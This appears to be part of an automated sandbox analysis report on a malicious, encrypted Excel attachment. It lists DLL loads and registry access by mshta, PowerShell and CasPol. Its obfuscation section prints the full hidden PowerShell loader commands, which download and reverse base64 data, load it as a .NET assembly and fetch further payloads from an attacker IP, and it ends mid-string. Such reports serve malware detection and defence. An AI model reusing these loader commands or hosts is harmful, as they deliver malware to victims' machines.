          Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: nlaapi.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc6.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: oleacc.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: credssp.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: bcrypt.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dll
          Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: dwmapi.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wow64win.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wow64cpu.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: winmm.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: version.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: shcore.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: iphlpapi.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: winnsi.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: rstrtmgr.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: ncrypt.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: bcrypt.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: dnsapi.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: dhcpcsvc6.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: dhcpcsvc.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: rasadhlp.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: cryptsp.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: secur32.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: winhttp.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: webio.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: nlaapi.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: rpcrtremote.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wow64win.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wow64cpu.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: version.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: secur32.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: cryptsp.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: rpcrtremote.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: atl.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wow64win.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wow64cpu.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: pstorec.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: atl.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wow64win.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wow64cpu.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: mozglue.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: dbghelp.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: version.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: msvcp140.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: vcruntime140.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: ucrtbase.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: winmm.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wsock32.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: cryptsp.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wow64win.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wow64cpu.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: version.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: secur32.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: cryptsp.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: rpcrtremote.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: atl.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wow64win.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wow64cpu.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: pstorec.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: atl.dll
          Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
          Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: Binary string: 7C:\Users\user\AppData\Local\Temp\xcygtrxb\xcygtrxb.pdbhP source: powershell.exe, 00000005.00000002.426757676.00000000023EA000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: 7C:\Users\user\AppData\Local\Temp\revod450\revod450.pdb source: powershell.exe, 00000012.00000002.477548914.000000000266C000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: 7C:\Users\user\AppData\Local\Temp\xcygtrxb\xcygtrxb.pdb source: powershell.exe, 00000005.00000002.426757676.00000000023EA000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: 7C:\Users\user\AppData\Local\Temp\revod450\revod450.pdbhP source: powershell.exe, 00000012.00000002.477548914.000000000266C000.00000004.00000800.00020000.00000000.sdmp
          Source: A & C Metrology OC 545714677889Materiale.xlsInitial sample: OLE indicators vbamacros = False
          Source: A & C Metrology OC 545714677889Materiale.xlsInitial sample: OLE indicators encrypted = True

          Data Obfuscation

          barindex
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $psHoME[21]+$PshOmE[30]+'x')(('ZkaimageUrl = QCxht'+'tps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvUhBYwur QCx;ZkawebClient = New-Object Sy'+'stem.Net.WebClient;ZkaimageB'+'ytes = ZkawebClient.DownloadData(ZkaimageUrl);ZkaimageText = [Syst'+'em.Text.Encoding]::UTF8.GetString(ZkaimageBytes);ZkastartFlag = QCx<'+'<BASE64_START>>QCx;ZkaendFlag = QCx<<BASE64_END>>QCx;ZkastartIndex = ZkaimageText.IndexOf(ZkastartFlag);ZkaendIndex = ZkaimageText.IndexOf(ZkaendFlag'+');ZkastartIndex -ge 0 -an'+'d ZkaendIndex -gt Z'+'kast'+'artIndex;ZkastartIn'+'dex += ZkastartFlag.Length;Zkabase64Length'+' = ZkaendIndex - ZkastartIndex;Zkabase64Command = ZkaimageText.Substrin'+'g(ZkastartIndex, '+'Zkabas'+'e64Length);Zkabase64Reversed = -join (Zkabase64Command.ToCharArray() KN5 ForEach-Object { Zk'+'a_ })[-1..-(Zkab'+'as'+'e64Command.Length)];ZkacommandBytes = [System.'+'Convert]::FromBase'+'64String(Zkabase64Reversed);ZkaloadedAssembly = [System.Reflection.Assembly]::Load(Zkacomma'+'ndBytes);ZkavaiMethod = [dnlib.IO.Home].Ge'+'tMethod(QCxVAIQCx);ZkavaiMethod.Invoke(Zkanull, @(QCxtxt.RRFVGGFR/75/64.641.471.701//:ptthQCx, QCxdesativadoQCx, QC'+'xdesativadoQCx, QCxdesativadoQCx, QCxCas'+'PolQCx, QCxdesativadoQ'+'Cx, QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCx1QCx,QCxdesativadoQCx));').rEPLaCe(([cHaR]90+[cHaR]107+[cHaR]97),[sTrIng][cHaR]36).rEPLaCe('KN5',[sTrIng][cHaR]124).rEPLaCe(([cHaR]81+[cHaR]67+[cHaR]120),[sTrIng][cHaR]39))"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $psHoME[21]+$PshOmE[30]+'x')(('ZkaimageUrl = QCxht'+'tps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvUhBYwur QCx;ZkawebClient = New-Object Sy'+'stem.Net.WebClient;ZkaimageB'+'ytes = ZkawebClient.DownloadData(ZkaimageUrl);ZkaimageText = [Syst'+'em.Text.Encoding]::UTF8.GetString(ZkaimageBytes);ZkastartFlag = QCx<'+'<BASE64_START>>QCx;ZkaendFlag = QCx<<BASE64_END>>QCx;ZkastartIndex = ZkaimageText.IndexOf(ZkastartFlag);ZkaendIndex = ZkaimageText.IndexOf(ZkaendFlag'+');ZkastartIndex -ge 0 -an'+'d ZkaendIndex -gt Z'+'kast'+'artIndex;ZkastartIn'+'dex += ZkastartFlag.Length;Zkabase64Length'+' = ZkaendIndex - ZkastartIndex;Zkabase64Command = ZkaimageText.Substrin'+'g(ZkastartIndex, '+'Zkabas'+'e64Length);Zkabase64Reversed = -join (Zkabase64Command.ToCharArray() KN5 ForEach-Object { Zk'+'a_ })[-1..-(Zkab'+'as'+'e64Command.Length)];ZkacommandBytes = [System.'+'Convert]::FromBase'+'64String(Zkabase64Reversed);ZkaloadedAssembly = [System.Reflection.Assembly]::Load(Zkacomma'+'ndBytes);ZkavaiMethod = [dnlib.IO.Home].Ge'+'tMethod(QCxVAIQCx);ZkavaiMethod.Invoke(Zkanull, @(QCxtxt.RRFVGGFR/75/64.641.471.701//:ptthQCx, QCxdesativadoQCx, QC'+'xdesativadoQCx, QCxdesativadoQCx, QCxCas'+'PolQCx, QCxdesativadoQ'+'Cx, QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCx1QCx,QCxdesativadoQCx));').rEPLaCe(([cHaR]90+[cHaR]107+[cHaR]97),[sTrIng][cHaR]36).rEPLaCe('KN5',[sTrIng][cHaR]124).rEPLaCe(([cHaR]81+[cHaR]67+[cHaR]120),[sTrIng][cHaR]39))"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $psHoME[21]+$PshOmE[30]+'x')(('ZkaimageUrl = QCxht'+'tps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvUhBYwur QCx;ZkawebClient = New-Object Sy'+'stem.Net.WebClient;ZkaimageB'+'ytes = ZkawebClient.DownloadData(ZkaimageUrl);ZkaimageText = [Syst'+'em.Text.Encoding]::UTF8.GetString(ZkaimageBytes);ZkastartFlag = QCx<'+'<BASE64_START>>QCx;ZkaendFlag = QCx<<BASE64_END>>QCx;ZkastartIndex = ZkaimageText.IndexOf(ZkastartFlag);ZkaendIndex = ZkaimageText.IndexOf(ZkaendFlag'+');ZkastartIndex -ge 0 -an'+'d ZkaendIndex -gt Z'+'kast'+'artIndex;ZkastartIn'+'dex += ZkastartFlag.Length;Zkabase64Length'+' = ZkaendIndex - ZkastartIndex;Zkabase64Command = ZkaimageText.Substrin'+'g(ZkastartIndex, '+'Zkabas'+'e64Length);Zkabase64Reversed = -join (Zkabase64Command.ToCharArray() KN5 ForEach-Object { Zk'+'a_ })[-1..-(Zkab'+'as'+'e64Command.Length)];ZkacommandBytes = [System.'+'Convert]::FromBase'+'64String(Zkabase64Reversed);ZkaloadedAssembly = [System.Reflection.Assembly]::Load(Zkacomma'+'ndBytes);ZkavaiMethod = [dnlib.IO.Home].Ge'+'tMethod(QCxVAIQCx);ZkavaiMethod.Invoke(Zkanull, @(QCxtxt.RRFVGGFR/75/64.641.471.701//:ptthQCx, QCxdesativadoQCx, QC'+'xdesativadoQCx, QCxdesativadoQCx, QCxCas'+'PolQCx, QCxdesativadoQ'+'Cx, QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCx1QCx,QCxdesativadoQCx));').rEPLaCe(([cHaR]90+[cHaR]107+[cHaR]97),[sTrIng][cHaR]36).rEPLaCe('KN5',[sTrIng][cHaR]124).rEPLaCe(([cHaR]81+[cHaR]67+[cHaR]120),[sTrIng][cHaR]39))"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $psHoME[21]+$PshOmE[30]+'x')(('ZkaimageUrl = QCxht'+'tps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvUhBYwur QCx;ZkawebClient = New-Object Sy'+'stem.Net.WebClient;ZkaimageB'+'ytes = ZkawebClient.DownloadData(ZkaimageUrl);ZkaimageText = [Syst'+'em.Text.Encoding]::UTF8.GetString(ZkaimageBytes);ZkastartFlag = QCx<'+'<BASE64_START>>QCx;ZkaendFlag = QCx<<BASE64_END>>QCx;ZkastartIndex = ZkaimageText.IndexOf(ZkastartFlag);ZkaendIndex = ZkaimageText.IndexOf(ZkaendFlag'+');ZkastartIndex -ge 0 -an'+'d ZkaendIndex -gt Z'+'kast'+'artIndex;ZkastartIn'+'dex += ZkastartFlag.Length;Zkabase64Length'+' = ZkaendIndex - ZkastartIndex;Zkabase64Command = ZkaimageText.Substrin'+'g(ZkastartIndex, '+'Zkabas'+'e64Length);Zkabase64Reversed = -join (Zkabase64Command.ToCharArray() KN5 ForEach-Object { Zk'+'a_ })[-1..-(Zkab'+'as'+'e64Command.Length)];ZkacommandBytes = [System.'+'Convert]::FromBase'+'64String(Zkabase64Reversed);ZkaloadedAssembly = [System.Reflection.Assembly]::Load(Zkacomma'+'ndBytes);ZkavaiMethod = [dnlib.IO.Home].Ge'+'tMethod(QCxVAIQCx);ZkavaiMethod.Invoke(Zkanull, @(QCxtxt.RRFVGGFR/75/64.641.471.701//:ptthQCx, QCxdesativadoQCx, QC'+'xdesativadoQCx, QCxdesativadoQCx, QCxCas'+'PolQCx, QCxdesativadoQ'+'Cx, QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCx1QCx,QCxdesativadoQCx));').rEPLaCe(([cHaR]90+[cHaR]107+[cHaR]97),[sTrIng][cHaR]36).rEPLaCe('KN5',[sTrIng][cHaR]124).rEPLaCe(([cHaR]81+[cHaR]67+[cHaR]120),[sTrIng][cHaR]39))"
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYStEM32\windOWSpOWErsHeLL\V1.0\PoWERShelL.exe" "PoweRshElL.EXe -Ex ByPAss -noP -W 1 -C dEvIcECreDEnTIaldEpLOYMent.EXE ; IeX($(Iex('[SYSTem.texT.enCoDIng]'+[chAR]0X3a+[cHAR]58+'UTf8.gETsTRInG([sYSTEM.CONverT]'+[cHAr]0x3a+[Char]58+'fRoMBASe64STrIng('+[cHaR]34+'JFhETklVVk0yVTJQICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10eXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFcmRlRmlOSVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd0xBYWd3b3csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHUmosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGd3cCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxdlcpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJiZUtsQXF0QWEiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB1TlFCdkdFdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkWEROSVVWTTJVMlA6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTc0LjE0Ni40Ni81Ny9waWN0dXJld2l0aGd